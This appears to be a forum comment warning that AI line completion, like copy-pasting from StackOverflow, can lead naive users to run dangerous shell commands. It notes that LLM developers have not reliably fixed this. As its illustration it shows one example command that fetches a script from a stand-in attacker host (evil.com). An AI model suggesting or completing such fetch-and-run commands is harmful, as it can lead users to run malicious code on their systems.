https://stackoverflow.com/a/28002687
https://stackoverflow.com/a/32282390
https://stackoverflow.com/a/18062293
Naive users used to copy paste those things from StackOverflow, now they can use line completion in their editor.
$ curl http<tab>
$ curl https://evil.com/run.sh
Then you’re just an enter away from causing havoc on your system.Similar to how using very difficult technologies makes you more likely to create code with vulnerabilities: the technologies are not the vulnerability, but it’s easier to cause them.
And it's the one thing the LLM developers have been trying to fix for the last 2 years. Apparently, even at the cost of some other functionality. It's not like they can do it reliably.
See also: https://nocomplexity.github.io/pythonsecurity/fundamentals/w...